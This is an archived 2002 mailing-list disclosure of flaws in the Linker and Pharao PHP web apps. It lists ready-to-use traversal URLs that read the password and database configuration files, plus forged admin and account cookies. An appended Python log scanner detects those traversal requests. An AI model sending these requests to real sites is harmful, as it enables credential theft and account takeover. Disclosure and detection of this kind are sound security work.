Vulnerability Development mailing list archives

Security holes : Linker, Pharao


From: frog frog <leseulfrog () hotmail com>
Date: 14 Apr 2002 13:14:15 -0000



Product1 :
Linker
http://enproject.codelib.co.kr

Versions :
2.0

Problems :
- Reading in HD
- Information recovery (passwords, DBHOST, DBUSER,...)

Exploits :
- /imageview.php?uid=../function/pass_info.php or /imageview.php?uid=../function/base_info.php
- Set cookies :
"admin_login","1"
"linker_key1",$adminid (pass_info.php)
"linker_key2",$adminpw (pass_info.php)

More details in french :
http://www.ifrance.com/kitetoua/tuto/Linker.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLinker.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

*****************************************************

Product2 :
Pharao
http://pharao.sourceforge.net

Versions :
0.06.04

Problems :
- XSS
- Path disclosure
- Sending msg anonymously
- Access to users/admins accounts
- Reading in HD
- 
- 

Exploits :
- Set cookie "pharao06","YOURNICK;YOURNAME;;;;classic_blue;en_GB;english;5" with value base64 crypted

- Set cookie "pharao06","ANICK;HISNAME;;;;classic_blue;en_GB;english;2"

- /filelist.php?op=view&ttitle=No%20Security&tcontent=admin

etc...

More details in french :
http://www.ifrance.com/kitetoua/tuto/Pharao.txt

translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FPharao.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

frog-m@n
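
A log check for the Linker imageview.php requests listed in the post above, as an added example that is not part of the original message: it flags `uid` values that step outside the image directory, including percent-encoded and double-encoded forms. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format assumed), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2002:13:20:01 +0000] "GET /imageview.php?uid=42 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [14/Apr/2002:13:21:09 +0000] "GET /imageview.php?uid=../function/pass_info.php HTTP/1.0" 200 312',
    '192.0.2.78 - - [14/Apr/2002:13:21:30 +0000] "GET /imageview.php?uid=%2e%2e%2ffunction%2fbase_info.php HTTP/1.0" 200 298',
    '192.0.2.79 - - [14/Apr/2002:13:22:02 +0000] "GET /imageview.php?uid=%252e%252e%252ffunction/pass_info.php HTTP/1.0" 404 0',
    '192.0.2.80 - - [14/Apr/2002:13:23:44 +0000] "GET /index.php?uid=7 HTTP/1.0" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(uid):
    """True if the value contains a parent-directory step, an absolute path or a NUL."""
    norm = fully_decode(uid).replace("\\", "/")
    return ".." in norm.split("/") or norm.startswith("/") or "\x00" in norm


def suspicious_requests(lines, script="/imageview.php", param="uid"):
    """Return (client_ip, decoded_value) for each traversal attempt against script."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(script):
            continue
        # parse_qs already decodes once; fully_decode handles further layers.
        for uid in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_traversal(uid):
                hits.append((line.split()[0], fully_decode(uid)))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested uid={value!r}")
```

A hit with a 200 status and a small response body is worth checking first, since pass_info.php and base_info.php are the files the post names as holding the admin and database settings.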

